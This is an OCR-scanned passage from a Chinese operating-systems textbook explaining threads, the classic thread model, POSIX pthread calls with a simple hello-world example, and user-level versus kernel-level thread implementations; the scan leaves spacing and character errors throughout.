在 这 一 设计 中 ， 前 面 两 个 例子 中 的 “顺序 进程 ”模型 消失 了 。 每 次 服务 器 从 为 某 个 请 求 工作 的 状态 
切换 到 另 一 个 状态 时 ， 都 必须 显 式 地 保存 或 重新 装 入 相应 的 计算 状态 。 事 实 上 ， 我 们 以 一 种 困难 的 方式 
模拟 了 线程 及 其 堆栈 。 这 里 ， 每 个 计算 都 有 一 个 被 保存 的 状态 ， 存 在 一 个 会 发 生 且 使 得 相关 状态 发 生 改 
变 的 事件 集合 ， 我 们 把 这 类 设计 称 为 有 限 状 态 机 (finite-state machine) 。 有 限 状态 机 这 一 概念 广泛 地 应 
用 在 计算 机 科学 中 。 

现在 很 清楚 多 线程 必须 提供 的 是 什么 了 。 多 线程 使 得 顺序 进程 的 思想 得 以 保留 下 来 ， 这 种 顺序 进程 
阻塞 了 系统 调用 (如 磁盘 IO) ， 但 是 仍旧 实现 了 并 行 性 。 对 系统 调用 进行 阻塞 使 程序 设计 变 的 较为 简单 ， 
而 且 并 行 性 改善 了 性 能 。 单 线程 服务 器 虽然 保留 了 阻塞 系统 调用 的 简易 性 ， 但 是 却 放 弃 了 性 能 。 第 三 种 
处 理 方法 运用 了 非 阻 塞 调用 和 中 断 ， 通 过 并 行 性 实现 了 高 性 能 ， 但 是 给 编程 增加 了 困难 。 在 图 2-10 中 给 
出 了 上 述 模式 的 总 结 。 










并 行 性 、 阻 塞 系统 调用 
单线 程 进程 无 开行 性 、 阻 塞 系统 调用 


图 2-10 构造 服务 器 的 三 种 方法 


有 关 多 线程 作用 的 第 三 个 例子 是 那些 必须 处 理 极 大量 数 据 的 应 用 。 通 常 的 处 理 方式 是 ， 读 进 一 块 数 
据 ， 对 其 处 理 ， 然 后 再 写 出 数据 。 这 里 的 问题 是 ， 如 果 只 能 使 用 阻塞 系统 调用 ， 那 么 在 数据 进入 和 数据 
输出 时 ， 会 阻塞 进程 。 在 有 大 量 计 算 需 要 处 理 的 时 候 ， 让 CPU 空转 显然 是 浪费 ， 应 该 尽 可 能 避免 。 

多 线程 提供 了 一 种 解决 方案 , 有关 的 进程 可 以 用 一 个 输入 线程 、 一 个 处 理 线程 和 一 个 输出 线程 构造 。 
输入 线程 把 数据 读 入 到 输入 缓冲 区 中 ， 处 理 线程 从 输入 缓冲 区 中 取出 数据 ， 处 理 数 据 ， 并 把 结果 放 到 输 
出 缓冲 区 中 ， 输 出 线程 把 这 些 结果 写 到 磁盘 上 。 按 照 这 种 工作 方式 ， 输 入 、 处 理 和 输出 可 以 全 部 同时 进 
行 。 当 然 ， 这 种 模型 只 有 当 系 统 调 用 只 阻塞 调用 线程 而 不 是 阻塞 整个 进程 时 ， 才 能 正常 工作 。 


2.2.2 经 典 的 线程 模型 

既然 已 经 清楚 为 什么 线程 会 有 用 以 及 如 何 使 用 它们 ， 不 如 让 我 们 用 更 进一步 的 眼光 来 审查 一 下 上 面 
的 想法 。 进 程 模型 基于 两 种 独立 的 概念 : 资源 分 组 处 理 与 执行 。 有 时 ， 将 这 两 种 概念 分 开会 更 好 ， 这 就 
引入 了 “线程 ”这 一 概念 。 下 面 先 介绍 经 典 的 线程 模型 ， 之 后 我 们 会 来 研究 “模糊 进程 与 线程 分 界线 ” 
的 Linux 线 程 模型 。 

理解 进程 的 一 个 角度 是 ， 用 某 种 方法 把 相关 的 资源 集中 在 一 起 。 进 程 有 存放 程序 正文 和 数据 以 及 其 
他 资源 的 地 址 空间 。 这 些 资源 中 包括 打开 的 文件 、 子 进程 、 即 将 发 生 的 定时 器 、 信 号 处 理 程序 、 账 号 信 
息 等 。 把 它们 都 放 到 进程 中 可 以 更 容易 管理 。 

另 一 个 概念 是 ,进程 拥有 一 个 执行 的 线程 , 通常 简写 为 线程 (thread), 在 线程 中 有 一 个 程序 计数 器 ， 
用 来 记录 接着 要 执行 哪 一 条 指令 。 线 程 拥有 寄存 器 ， 用 来 保存 线程 当前 的 工作 变量 。 线 程 还 拥有 一 个 堆 


58 #2 


栈 ， 用 来 记录 执行 历史 ， 其 中 每 一 帧 保存 了 一 个 已 调用 的 但 是 还 没有 从 中 返回 的 过 程 。 尽 管线 程 必须 在 
某 个 进程 中 执行 ， 但 是 线程 和 它 的 进程 是 不 同 的 概念 ， 并且 可 以 分 别处 理 。 进 程 用 于 把 资源 集中 到 一 起 ， 
而 线程 则 是 在 CPU 上 被 调度 执行 的 实体 。 

线程 给 进程 模型 增加 了 一 项 内 容 ， 即 在 同一 个 进程 环境 中 ， 人 允许 彼此 之 间 有 较 大 独立 性 的 多 个 线程 
执行 。 在 同一 个 进程 中 并 行 运行 多 个 线程 ， 是 对 在 同一 台 计算 机 上 并 行 运 行 多 个 进程 的 模拟 。 在 前 一 种 
情形 下 ， 多 个 线程 共享 同一 个 地 址 空间 和 其 他 资源 。 而 在 后 一 种 情形 中 ， 多 个 进程 共享 物理 内 存 、 磁 盘 、 
打印 机 和 其 他 资源 。 由 于 线程 具有 进程 的 某 些 性 质 ， 所 以 有 时 被 称 为 轻 量 级 进程 (lightweight process), 
多 线程 这 个 术语 ， 也 用 来 描述 在 同一 个 进程 中 允许 多 个 线程 的 情形 。 正 如 在 第 1 章 中 看 到 的 ， 一 些 CPU 
已 经 有 直接 硬件 支持 多 线程 ， 并 人 允许 线程 切换 在 纳 秒 级 完成 。 

在 图 2-11a 中 ， 可 以 看 到 三 个 传统 的 进程 。 每 个 进程 有 自己 的 地 址 空间 和 单个 控制 线程 。 相 反 ， 在 
图 2-11b 中 ， 可 以 看 到 一 个 进程 带 有 三 个 控制 线程 。 尽 管 在 两 种 情形 中 都 有 三 个 线程 ， 但 是 在 图 2-11a 中 ， 
每 一 个 线程 都 在 不 同 的 地 址 空间 中 运行 ， 而 在 图 2-11b 中 ， 这 三 个 线程 全 部 在 相同 的 地 址 空间 中 运行 。 

当 多 线程 进程 在 单 CPU 系 统 中 运行 时 ， 线 程 轮流 运行 。 从 图 2-1 中 ， 我 们 已 经 看 到 了 进程 的 多 道 程 
序 设计 是 如 何 工作 的 。 通 过 在 多 个 进程 之 闻 来 回 切 换 ， 系 统制 造 了 不 同 的 顺序 进程 并 行 运行 的 假象 。 多 
线程 的 工作 方式 也 是 类 似 的 。CPU 在 线程 之 间 的 快速 切换 ， 制 造 了 线程 并 行 运行 的 假象 ， 好 似 它们 在 一 
个 比 实际 CPU 慢 一 些 的 CPU 上 同时 运行 。 在 一 个 有 三 个 计算 密集 型 线程 的 进程 中 ,线程 以 并 行 方式 运行 ， 
每 个 线程 在 一 个 CPU 上 得 到 了 真实 CPU 速度 的 三 分 之 一 。 
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图 2-11 a) 三 个 进程 ， 每 个 进程 有 一 个 线程 ，b) 一 个 进程 带 三 个 线程 


进程 中 的 不 同 线程 不 像 不 同 进程 之 间 那 样 存在 很 大 的 独立 性 .所 有 的 线程 都 有 完全 一 样 的 地 址 空间 ， 
这 意味 着 它们 也 共享 同样 的 全 局 变量 。 由 于 各 个 线程 都 可 以 访问 进程 地 址 空间 中 的 每 一 个 内 存 地 址 ， 所 
以 一 个 线程 可 以 读 、 写 或 甚至 清除 另 一 个 线程 的 堆栈 。 线 程 之 间 是 没有 保护 的 ， 原 因 是 : 1) 不 可 能 ， 
2) 也 没有 必要 。 这 与 不 同 进程 是 有 差别 的 。 不 同 的 进程 会 来 自 不 同 的 用 户 ， 它 们 彼此 之 间 可 能 有 敌意 ， 
一 个 进程 总 是 由 某 个 用 户 所 拥有 ， 该 用 户 创建 多 个 线程 应 该 是 为 了 它们 之 间 的 合作 而 不 是 彼此 间 争 斗 。 
除了 共享 地 址 空间 之 外 ， 所 有 线程 还 共享 同一 个 打开 文件 集 、 子 进程 、 定 时 器 以 及 相关 信号 等 ， 如 图 2- 
12 所 示 。 这 样 ， 对 于 三 个 没有 关系 的 线程 而 言 ， 应 该 使 用 图 2-11a 的 结构 ， 而 在 三 个 线程 实际 完成 同一 
个 作业 ， 并 彼此 积极 密切 合作 的 情形 中 ， 图 2-11b 则 比较 合适 。 





每 个 进程 中 的 内 容 每 个 线程 中 的 内 容 
地 址 空间 程序 计数 器 

全 局 变量 寄存 器 

打开 文件 堆栈 

子 进程 状态 
即将 发 生 的 定时 器 

信号 与 信号 处 理 程序 

账户 信息 





图 2-12 第 一 列 给 出 了 在 一 个 进程 中 所 有 线程 共享 的 内 容 ， 第 二 列 给 出 了 每 个 线程 自己 的 内 容 
图 2-12 中 ， 第 一 列表 项 是 进程 的 属性 ， 而 不 是 线程 的 属性 。 例 如 ， 如 果 一 个 线程 打开 了 一 个 文件 ， 


进程 与 线程 59 


该 文件 对 该 进程 中 的 其 他 线程 都 可 见 ， 这 些 线程 可 以 对 该 文件 进行 读 写 。 由 于 资源 管理 的 单位 是 进程 而 
非 线程 ， 所 以 这 种 情形 是 合理 的 。 如 果 每 个 线程 有 其 自己 的 地 址 空间 、 打 开 文 件 、 即 将 发 生 的 定时 器 等 ， 
那么 它们 就 应 该 是 不 同 的 进程 了 。 线 程 概念 试图 实现 的 是 ， 共 享 一 组 资源 的 多 个 线程 的 执行 能 力 ， 以 便 
这 些 线程 可 以 为 完成 某 一 任务 而 共同 工作 。 

和 传统 进程 一 样 〈 即 只 有 一 个 线程 的 进程 )， 线 程 可 以 处 于 若干 种 状态 的 任何 一 个 : 运行 、 阻 塞 、 
就 绪 或 终止 。 正 在 运行 的 线程 拥有 CPU 并 且 是 活跃 线程 2 
的 。 被 阻塞 的 线程 正在 等 待 某 个 释放 它 的 事件 。 例 
如 ， 当 一 个 线程 执行 从 键盘 读 入 数据 的 系统 调用 时 ， 
该 线程 就 被 阻塞 直到 键入 了 输入 为 止 。 线 程 可 以 被 
阻塞 ， 以 便 等 待 某 个 外 部 事件 的 发 生 或 者 等 待 其 他 
线程 来 释放 它 。 就 绪 线程 可 被 调度 运行 ， 并 且 只 要 
轮 到 它 就 很 快 可 以 运行 。 线 程 状态 之 间 的 转换 和 进 
程 状态 之 间 的 转换 是 一 样 的 ， 如 图 2-2 所 示 。 

认识 到 每 个 线程 有 其 自己 的 堆栈 很 重要 ， 如 
图 2-13 所 示 。 每 个 线程 的 堆栈 有 一 帧 ， 供 各 个 被 调 
用 但 是 还 没有 从 中 返回 的 过 程 使 用 。 在 该 栈 帧 中 存 
放 了 相应 过 程 的 局 部 变量 以 及 过 程 调用 完成 之 后 使 
用 的 返回 地 址 。 例 如 ， 如 果 过 程 X 调 用 过 程 Y， 而 Y 又 调用 Z， 那 么 当 Z 执 行 时 ， 供 X、Y 和 2Z 使 用 的 栈 帧 
会 全 部 存在 堆栈 中 。 通 常 每 个 线程 会 调用 不 同 的 过 程 ， 从 而 有 一 个 各 自 不 同 的 执行 历史 ， 这 就 是 为 什么 
每 个 线程 需要 有 自己 的 堆栈 的 原因 。 

在 多 线程 的 情况 下 ， 进 程 通常 会 从 当前 的 单个 线程 开始 。 这 个 线程 有 能 力 通过 调用 一 个 库 函 数 (如 
thread_create) 创建 新 的 线程 。thread_create 的 参数 专门 指定 了 新 线程 要 运行 的 过 程 名 。 这 里 ， 没 有 必要 
对 新 线程 的 地 址 空间 加 以 规定 ， 因 为 新 线程 会 自动 在 创建 线程 的 地 址 空间 中 运行 。 有 时 ， 线 程 是 有 层次 
的 ， 它 们 具有 一 种 父子 关系 ， 但 是 ， 通 常 不 存在 这 样 一 种 关系 ， 所 有 的 线程 都 是 平等 的 。 不 论 有 无 层次 
关系 ， 创 建 线程 通常 都 返回 一 个 线程 标识 符 ， 该 标识 符 就 是 新 线程 的 名 字 。 

当 一 个 线程 完成 工作 后 ， 可 以 通过 调用 一 个 库 过 程 (如 thread_exit) 退出 。 该 线程 接着 消失 ， 不 再 
可 调度 。 在 某 些 线程 系统 中 ， 通 过 调用 一 个 过 程 ， 例 如 thread_join， 一 个 线程 可 以 等 待 一 个 (特定 ) 线 
程 退出 。 这 个 过 程 阻 塞 调 用 线程 直到 那个 〈 特 定 ) 线程 退出 。 在 这 种 情况 下 ， 线 程 的 创建 和 终止 非常 类 
似 于 进程 的 创建 和 终止 ， 并 且 也 有 着 同样 的 选项 。 

另 一 个 常见 的 线程 调用 是 thread_yield， 它 允许 线程 自动 放弃 CPU 从 而 让 另 一 个 线程 运行 。 这 样 一 个 
调用 是 很 重要 的 ， 因 为 不 同 于 进程 ，( 线 程 库 ) 无 法 利用 时 钟 中 断 强制 线程 让 出 CPU。 所 以 设法 使 线程 行 
为 “高 尚 ”起 来 ， 并 且 随 着 时 间 的 推移 自动 交 出 CPU ， 以 便 让 其 他 线程 有 机 会 运行 ， 就 变 得 非常 重要 。 
有 的 调用 允许 某 个 线程 等 待 另 一 个 线程 完成 某 些 任务 ， 或 等 待 一 个 线程 宣称 它 已 经 完成 了 有 关 的 工作 等 。 

通常 而 言 ， 线 程 是 有 益 的 ， 但 是 线程 也 在 程序 设计 模式 中 引入 了 某 种 程度 的 复杂 性 。 考 虑 一 下 
UNIX 中 的 fork 系 统 调 用 。 如 果 父 进程 有 多 个 线程 ， 那 么 它 的 子 进 程 也 应 该 拥有 这 些 线程 吗 ? 如 果 不 是 ， 
则 该 子 进程 可 能 会 工作 不 正常 ， 因 为 在 该 子 进 程 中 的 线程 都 是 绝对 必要 的 。 

然而 ， 如 果子 进程 拥有 了 与 父 进程 一 样 的 多 个 线程 ， 如 果 父 进程 在 read 系 统 调 用 (比如 键盘 ) 上 被 
阻塞 了 会 发 生 什么 情况 ? 是 两 个 线程 被 阻塞 在 键盘 上 (一 个 属于 父 进程 ， 另 一 个 属于 子 进 程 ) 吗 ? 在 键 
入 一 行 输入 之 后 ， 这 两 个 线程 都 得 到 该 输入 的 副本 吗 ? 还 是 仅 有 父 进 程 得 到 该 输入 的 副本 ? 或 是 仅 有 子 
进程 得 到 ? 类 似 的 问题 在 进行 网 络 连接 时 也 会 出 现 。 

另 一 类 问题 和 线程 共享 许多 数据 结构 的 事实 有 关 。 如 果 一 个 线程 关闭 了 某 个 文件 ， 而 另 一 个 线程 还 
在 该 文件 上 进行 读 操作 时 会 怎样 ? 假设 有 一 个 线程 注意 到 几乎 没有 内 存 了 ， 并 开始 分 配 更 多 的 内 存 。 在 
工作 一 半 的 时 候 ， 发 生 线程 切换 ， 新 线程 也 注意 到 几乎 没有 内 存 了 ,并 且 也 开始 分 配 更 多 的 内 存 。 这 样 ， 
内 存 可 能 会 被 分 配 两 次 。 不 过 这 些 问 题 通过 努力 是 可 以 解决 的 。 总 之 ， 要 使 多 线程 的 程序 正确 工作 ， 就 
需要 仔细 思考 和 设计 。 





图 2-13 每 个 线程 有 其 自己 的 堆栈 
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2.2.3 POSIX 线 程 

为 实现 可 移植 的 线程 程序 ，IEEE 在 IEEE 标 准 1003.1c 中 定义 了 线程 的 标准 。 它 定义 的 线程 包 叫 作 
pthread。 大 部 分 UNIX 系 统 都 支持 该 标准 。 这 个 标准 定义 了 超过 60 个 函数 调用 ， 如 果 在 这 里 列举 一 遍 就 
太 多 了 。 这 里 仅 描述 一 些 主要 的 函数 ， 以 说 明 它 是 如 何 工作 的 。 图 2-14 中 列举 了 这 些 函 数 调用 。 

所 有 pthread 线 程 都 有 某 些 特性 。 每 一 个 都 含有 一 个 标识 符 、 一 组 寄存 器 (包括 程序 计数 器 ) 和 一 组 
存储 在 结构 中 的 属性 。 这 些 属性 包括 堆栈 大 小 、 调 度 参数 以 及 其 他 线程 需要 的 项 目 。 
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图 2-14 一 些 pthread 的 函数 调用 


创建 一 个 新 线程 需要 使 用 pthread_create 调 用 。 新 创建 的 线程 的 线程 标识 符 会 作为 函数 值 返回 。 这 种 
调用 有 意 看 起 来 很 像 fork 系 统 调 用 ， 其 中 线程 标识 符 起 着 PID 的 作用 ， 而 这 么 做 的 目的 主要 是 为 了 标识 
在 其 他 调用 中 引用 的 线程 。 

当 一 个 线程 完成 分 配给 它 的 工作 时 ， 可 以 通过 调用 pthread_exit 来 终止 。 这 个 调用 终止 该 线程 并 释 
放 它 的 栈 。 

一 般 一 个 线程 在 继续 运行 前 需要 等 待 另 一 个 线程 完成 它 的 工作 并 退出 。 可 以 通过 pthread_join 线 程 
调用 来 等 待 别 的 特定 线程 的 终止 。 而 要 等 待 线程 的 线程 标识 符 作为 一 个 参数 给 出 。 

有 时 会 出 现 这 种 情况 : 一 个 线程 逻辑 上 没有 阻塞 ,但 感觉 上 它 已 经 运行 了 足够 长 时 间 并 且 希 望 给 另 
外 一 个 线程 机 会 去 运行 。 这 时 可 以 通过 调用 pthread_yield 完 成 这 一 目标 。 而 进程 中 没有 这 种 调用 ， 因 为 
假设 进程 间 会 有 激烈 的 竞争 性 ， 并 且 每 一 个 进程 都 希望 获得 它 所 能 得 到 的 所 有 的 CPU 时 间 。 但 是 ， 由 于 
同一 进程 中 的 线程 可 以 同时 工作 ， 并 且 它 们 的 代码 总 是 由 同一 个 程序 员 编 写 的 ， 因 此 ， 有 了 时 程序 员 希 望 
它们 能 互相 给 对 方 一 些 机 会 去 运行 。 

下 面 两 个 线程 调用 是 处 理 属性 的 。pthread_attr_init 建 立 关联 一 个 线程 的 属性 结构 并 初始 化 成 默认 值 。 
这 些 值 (例如 优先 级 ) 可 以 通过 修改 属性 结构 中 的 域 值 来 改变 。 

最 后 ，pthread_attr_destroy 删 除 一 个 线程 的 属性 结构 ， 释 放 它 占用 的 内 存 。 它 不 会 影响 调用 它 的 线 
程 。 这 些 线程 会 继续 存在 。 

为 了 更 好 地 了 解 pthread 是 如 何 工作 的 ， 考 虑 图 2-15 提 供 的 简单 例子 。 这 里 主 程序 在 宣布 它 的 意图 之 
后 ,循环 NUMBER_OF_THREADS 次 ， 每 次 创建 一 个 新 的 线程 。 如 果 线 程 创建 失败 ,会 打印 出 一 条 错 
误 信息 然后 退出 。 在 创建 完 所 有 线程 之 后 ， 主 程序 退出 。 

当 创 建 一 个 线程 时 ， 它 打印 一 条 一 行 的 发 布 信息 ， 然 后 退出 。 这 些 不 同 信息 交错 的 顺序 是 不 确定 的 ， 
并 且 可 能 在 连续 运行 程序 的 情况 下 发 生变 化 。 

pthread 调 用 不 只 是 前 面 介绍 的 这 几 个 ， 还 有 许多 的 pthread 调 用 会 在 讨论 “进程 与 线程 同步 ”之 后 
再 介绍 。 


2.2.4 在 用 户 空间 中 实现 线程 

有 两 种 主要 的 方法 实现 线程 包 : 在 用 户 空间 中 和 在 内 核 中 。 这 两 种 方法 互 有 利弊 ， 不 过 混合 实现 方 
式 也 是 可 能 的 。 我 们 现在 介绍 这 些 方法 ， 并 分 析 它 们 的 优点 和 缺点 。 

第 一 种 方法 是 把 整个 线程 包 放 在 用 户 空间 中 ， 内 核对 线程 包 一 无 所 知 。 从 内 核 角度 考虑 ， 就 是 按 正 
常 的 方式 管理 ， 即 单线 程 进程 。 这 种 方法 第 一 个 也 是 最 明显 的 优点 是 ， 用 户 级 线程 包 可 以 在 不 支持 线程 
的 操作 系统 上 实现 。 过 去 所 有 的 操作 系统 都 属于 这 个 范围 ， 即 使 现在 也 有 一 些 操作 系统 还 是 不 支持 线程 。 
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通过 这 一 方法 ， 可 以 用 函数 库 实现 线程 。 


#include <pthread.h> 
#include <stdio.h> 
#include <stdlib.h> 


#define NUMBER_OF_THREADS 10 


void *print_hello_world(void «tid) 


广 本 函数 输出 线程 的 标识 符 ， 然 后 退出 。 */ 
printf("Hello World. Greetings from thread %d\n", tid); 
pthread_exit(NULL); 

} 


int main(int argc, char *argv[]) 


{ 
店主 程序 创建 10 个 线程 ， 然 后 退出 。 %/ 
pthread_t threads|NUMBER_OF_THREADS]; 
int status, i; 


for(i=0; i < NUMBER_OF_THREADS; i++) { 
printf("Main here. Creating thread %d\n", i); 
status = pthread_create(&threads[i], NULL, print_hello_world, (void *)i); 


if (status != 0) { 
printf("Oops. pthread_create returned error code %d\n", status); 
exit(-1); 

} 


} 
exit(NULL); 





图 2-15 使 用 线程 的 一 个 例子 程序 


所 有 的 这 类 实现 都 有 同样 的 通用 结构 ， 如 图 2-16a 所 示 。 线 程 在 一 个 运行 时 系统 的 上 层 运行 ， 该 运 
行 时 系统 是 一 个 管理 线程 的 过 程 的 集合 。 前面 已 经 介绍 过 其 中 的 四 个 过 程 : pthread_create, pthread_exit, 
pthread_join 和 pthread_yield。 不 过 ， 一 般 还 会 有 更 多 的 过 程 。 


进程 线程 





图 2-16 a) 用 户 级 线程 包 ，b) 由 内 核 管理 的 线程 包 


在 用 户 空间 管理 线程 时 ， 每 个 进程 需要 有 其 专用 的 线程 表 (thread table) ， 用 来 跟踪 该 进程 中 的 线 
程 。 这 些 表 和 内 核 中 的 进程 表 类 似 ， 不 过 它 仅 仅 记录 各 个 线程 的 属性 ， 如 每 个 线程 的 程序 计数 器 、 堆 栈 
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指针 、 寄 存 器 和 状态 等 。 该 线程 表 由 运行 时 系统 管理 。 当 一 个 线程 转换 到 就 绪 状 态 或 阻塞 状态 时 ， 在 该 
线程 表 中 存放 重新 启动 该 线程 所 需 的 信息 ， 与 内 核 在 进程 表 中 存放 进程 的 信息 完全 一 样 。 

当 某 个 线程 做 了 一 些 会 引起 在 本 地 阻塞 的 事情 之 后 ， 例 如 ， 等 待 进程 中 另 一 个 线程 完成 某 项 工作 ， 
它 调 用 一 个 运行 时 系统 的 过 程 ， 这 个 过 程 检查 该 线程 是 否 必 须 进 入 阻塞 状态 。 如 果 是 ， 它 在 线程 表 中 保 
存 该 线程 的 寄存 器 ( 即 它 本 身 的 ) ， 查 看 表 中 可 运行 的 就 绪 线 程 ， 并 把 新 线程 的 保存 值 重新 装 入 机 器 的 寄 
存 器 中 。 只 要 堆栈 指针 和 程序 计数 器 一 被 切换 ， 新 的 线程 就 又 自动 投入 运行 。 如 果 机 器 有 一 条 保存 所 有 
寄存 器 的 指令 和 另 一 条 装 入 全 部 寄存 器 的 指令 ， 那 么 整个 线程 的 切换 可 以 在 几 条 指令 内 完成 。 进 行 类 似 
于 这 样 的 线程 切换 至 少 比 陷 人 内核 要 快 一 个 数量 级 (或许 更 多 ) ， 这 是 使 用 用 户 级 线程 包 的 极 大 的 优点 。 

不 过 ， 线 程 与 进程 有 一 个 关键 的 差别 。 在 线程 完成 运行 时 ， 例 如 ， 在 它 调用 thread_yield 时 ， 
pthread_yield 代 码 可 以 把 该 线程 的 信息 保存 在 线程 表 中 ， 进 而 ， 它 可 以 调用 线程 调度 程序 来 选择 另 一 个 
要 运行 的 线程 。 保 存 该 线程 状态 的 过 程 和 调度 程序 都 只 是 本 地 过 程 ， 所 以 启动 它们 比 进行 内 核 调用 效率 
更 高 。 另 一 方面 ， 不 需要 陷 人 内 核 ， 不 需要 上 下 文 切 换 ， 也 不 需要 对 内 存 高 速 缓存 进行 刷新 ， 这 就 使 得 
线程 调度 非常 快捷 。 

用 户 级 线程 还 有 另 一 个 优点 。 它 允许 每 个 进程 有 自己 定制 的 调度 算法 。 例 如 ， 在 某 些 应 用 程序 中 ， 
那些 有 垃圾 收集 线程 的 应 用 程序 就 不 用 担心 线程 会 在 不 合适 的 时 刻 停 止 ， 这 是 一 个 长 处 。 用 户 级 线程 还 
具有 较 好 的 可 扩展 性 ， 这 是 因为 在 内 核 空间 中 内 核 线程 需要 一 些 固定 表格 空间 和 堆栈 空间 ， 如 果 内 核 线 
程 的 数量 非常 大 ， 就 会 出 现 问 题 。 

尽管 用 户 级 线程 包 有 更 好 的 性 能 ， 但 它 也 存在 一 些 明 显 的 问题 。 其 中 第 一 个 问题 是 如 何 实现 阻塞 系 
统 调用 。 假 设 在 还 没有 任何 击 键 之 前 ， 一 个 线程 读 取 键 盘 。 让 该 线程 实际 进行 该 系统 调用 是 不 可 接受 的 ， 
因为 这 会 停止 所 有 的 线程 。 使 用 线程 的 一 个 主要 目标 是 ， 首 先 要 人 允许 每 个 线程 使 用 阻塞 调用 ， 但 是 还 要 
避免 被 阻塞 的 线程 影响 其 他 的 线程 。 有 了 阻塞 系统 调用 ， 这 个 目标 不 是 轻易 地 能 够 实现 的 。 

系统 调用 可 以 全 部 改 成 非 阻塞 的 (例如 ， 如 果 没 有 被 缓冲 的 字符 ， 对 键盘 的 read 操 作 可 以 只 返回 0 
FH), 但 是 这 需要 修改 操作 系统 ， 所 以 这 个 办 法 也 不 吸引 人 。 而 且 ， 用 户 级 线程 的 一 个 长 处 就 是 它 可 
以 在 现 有 的 操作 系统 上 运行 。 另 外 ， 改 变 read 操 作 的 语义 需要 修改 许多 用 户 程 序 。 

在 这 个 过 程 中 ， 还 有 一 种 可 能 的 替代 方案 ， 就 是 如 果 某 个 调用 会 阻塞 ， 就 提前 通知 。 在 某 些 UNIX 
版 本 中 ， 有 一 个 系统 调用 select 可 以 允许 调用 者 通知 预期 的 read 是 否 会 阻塞 。 若 有 这 个 调用 ， 那 么 库 过 
程 read 就 可 以 被 新 的 操作 替代 ， 首 先进 行 select 调 用 ， 然 后 只 有 在 安全 的 情形 下 ( 即 不 会 阻塞 ) 才 进 行 
read 调 用 。 如 果 read 调 用 会 被 阻塞 ， 有 关 的 调用 就 不 进行 ， 代 之 以 运行 另 一 个 线程 。 到 了 下 次 有 关 的 运 
行 系统 取得 控制 权 之 后 ， 就 可 以 再 次 检查 看 看 现在 进行 read 调 用 是 否 安全 。 这 个 处 理 方 法 需要 重 写 部 分 
系统 调用 库 ， 所 以 效率 不 高 也 不 优雅 ， 不 过 没有 其 他 的 可 选 方案 了 。 在 系统 调用 周围 从 事 检查 的 这 类 代 
码 称 为 包装 器 (jacket 或 wrapper) 。 

与 阻塞 系统 调用 问题 有 些 类 似 的 是 缺 页 中 断 问 题 ， 我 们 将 在 第 3 章 讨 论 这 些 问 题 。 此 刻 可 以 认为 ， 
把 计算 机 设置 成 这 样 一 种 工作 方式 ， 即 并 不 是 所 有 的 程序 都 一 次 性 放 在 内 存 中 。 如 果 某 个 程序 调用 或 者 
跳 转 到 了 一 条 不 在 内 存 的 指令 上 ， 就 会 发 生 页 面 故障 ， 而 操作 系统 将 到 磁盘 上 取 回 这 个 丢失 的 指令 (和 
该 指令 的 “邻居 们 ”) ， 这 就 称 为 页 面 故障 。 在 对 所 需 的 指令 进行 定位 和 读 入 时 ， 相 关 的 进程 就 被 阻塞 。 
如 果 有 一 个 线程 引起 页 面 故障 ， 内 核 由 于 甚至 不 知道 有 线程 存在 ， 通 常会 把 整个 进程 阻塞 直到 磁盘 IO 
完成 为 止 ， 尽 管 其 他 的 线程 是 可 以 运行 的 。 

用 户 级 线程 包 的 另 一 个 问题 是 ， 如 果 一 个 线程 开始 运行 ， 那 么 在 该 进程 中 的 其 他 线程 就 不 能 运行 ， 
除非 第 一 个 线程 自动 放弃 CPU。 在 一 个 单独 的 进程 内 部 ， 没 有 时 钟 中 断 ， 所 以 不 可 能 用 轮转 调度 (轮流 ) 
的 方式 调度 线程 。 除 非 某 个 线程 能 够 按照 自己 的 意志 进入 运行 时 系统 ， 否 则 调度 程序 就 没有 任何 机 会 。 

对 线程 永久 运行 问题 的 一 个 可 能 的 解决 方案 是 让 运行 时 系统 请 求 每 秒 一 次 的 时 钟 信 号 (中 断 ) ， 但 
是 这 样 对 程序 也 是 生硬 和 无 序 的 。 不 可 能 总 是 高 频率 地 发 生 周期 性 的 时 钟 中 断 ， 即 使 可 能 ， 总 的 开销 也 
是 可 观 的 。 而 且 ， 线 程 可 能 也 需要 时 钟 中 断 ， 这 就 会 扰乱 运行 时 系统 使 用 的 时 钟 。 

再 者 ， 也 许 针 对 用 户 级 线程 的 最 大 负面 争论 意见 是 ， 程 序 员 通 常 在 经 常 发 生 线程 阻塞 的 应 用 中 才 希 
望 使 用 多 个 线程 。 例 如 ， 在 多 线程 Web 服 务 器 里 。 这 些 线程 持续 地 进行 系统 调用 ， 而 一 旦 发 生 内 核 陷阱 
进行 系统 调用 ， 如 果 原 有 的 线程 已 经 阻塞 ， 就 很 难 让 内 核 进行 线程 的 切换 ， 如 果 要 让 内 核 消 除 这 种 情形 ， 
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就 要 持续 进行 select 系 统 调 用 ， 以 便 检 查 read 系 统 调 用 是 否 安 全 。 对 于 那些 基本 上 是 CPU 密集 型 而 且 极 
少 有 阻塞 的 应 用 程序 而 言 ， 使 用 多 线程 的 目的 又 何在 呢 ? 由 于 这 样 的 做 法 并 不 能 得 到 任何 益处 ， 所 以 没 
有 人 会 真正 提出 使 用 多 线程 来 计算 前 "个 素数 或 者 下 象棋 等 一 类 工作 。 


2.2.5 在 内 核 中 实现 线程 

现在 考虑 内 核 支持 和 管理 线程 的 情形 。 如 图 2-16b 所 示 ， 此 时 不 再 需要 运行 时 系统 了 。 另 外 ， 每 个 
进程 中 也 没有 线程 表 。 相 反 ， 在 内 核 中 有 用 来 记录 系统 中 所 有 线程 的 线程 表 。 当 某 个 线程 希望 创建 一 个 
新 线程 或 撤销 一 个 已 有 线程 时 ， 它 进行 一 个 系统 调用 ， 这 个 系统 调用 通过 对 线程 表 的 更 新 完成 线程 创建 
或 撤销 工作 。 

内 核 的 线程 表 保存 了 每 个 线程 的 寄存 器 、 状 态 和 其 他 信息 。 这 些 信息 和 在 用 户 空间 中 (在 运行 时 系 
统 中 ) 的 线程 是 一 样 的 ， 但 是 现在 保存 在 内 核 中 。 这 些 信息 是 传统 内 核 所 维护 的 每 个 单线 程 进程 信息 
( 即 进程 状态 ) 的 子 集 。 另外， 内核 还 维护 了 传统 的 进程 表 ， 以 便 跟踪 进程 的 状态 。 

所 有 能 够 阻塞 线程 的 调用 都 以 系统 调用 的 形式 实现 ,这 与 运行 时 系统 过 程 相 比 ,代价 是 相当 可 观 的 。 

当 一 个 线程 阻塞 时 ， 内 核 根据 其 选择 ， 可 以 运行 同一 个 进程 中 的 另 一 个 线程 (车 有 一 个 就 绪 线程 ) 或 者 
